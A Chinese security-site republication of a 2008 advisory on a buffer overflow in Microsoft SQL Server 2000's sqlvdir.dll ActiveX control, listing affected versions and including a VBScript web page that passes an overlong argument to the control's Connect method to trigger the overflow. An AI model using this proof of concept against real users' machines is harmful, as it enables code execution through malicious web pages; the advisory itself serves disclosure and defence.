首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
Microsoft SQL Server sqlvdir.dll ActiveX控件缓冲区溢出漏洞
来源:beenudel1986@gmail.com 作者:Arora 发布时间:2008-09-16  

Microsoft SQL Server sqlvdir.dll ActiveX控件缓冲区溢出漏洞
受影响系统:
Microsoft SQL Server 2000 SP4
Microsoft SQL Server 2000 SP3a
Microsoft SQL Server 2000 SP3
Microsoft SQL Server 2000 SP2
Microsoft SQL Server 2000 SP1
Microsoft SQL Server 2000
描述:
--------------------------------------------------------------------------------
BUGTRAQ   ID: 31129

Microsoft SQL Server是一款流行的SQL数据库系统。

SQL Server所安装的sqlvdir.dll ActiveX控件(默认路径为C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlvdir.dll,clsid:FC13BAA2-9C1A-4069-A221-31A147636038)所暴露的ISQLVDirControl接口没有正确的验证用户输入参数,如果用户受骗访问了恶意网页并向该方式传送了超长参数的话,就可能触发缓冲区溢出,导致执行任意代码。

<*来源:Beenu Arora (beenudel1986@gmail.com)
  
   链接http://marc.info/?l=bugtraq&m=122115323714605&w=2
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html>
Test Exploit page
<object classid='clsid:FC13BAA2-9C1A-4069-A221-31A147636038' id='target' ></object>
<script language='vbscript'>
targetFile = "C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlvdir.dll"
prototype   = "Sub Connect ( [ ByVal szServer As Variant ] ,   [ ByVal szWebSite As Variant ] )"   memberName = "Connect"
progid     = "SQLVDIRLib.SQLVDirControl"
argCount   = 2
arg1="defaultV"
arg2="http://test\test\test\te?s\test\test\tes\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\"  
target.Connect arg1 ,arg2

</script>

建议:
--------------------------------------------------------------------------------
厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/technet/security/


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·Microsoft SQL Server sqlvdir.d
·QQ客户端网站链接过滤不严可导致
·百度Hi Csrf蠕虫攻击
·IE8 XSS Filter Bypass
·Mozilla FireFox <= 2.0.16 UTF8
·高危通告:国内90%邮件服务商存在
·多款RSS阅读器出现XSS漏洞
·DEDECMS跨站及爆绝对路径漏洞
·Discuz!NT 2.5(20080826更新前
·QQ Mail跨站脚本漏洞
·公开一个路径优先的"圈day"
·dedecms5.1最新漏洞
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved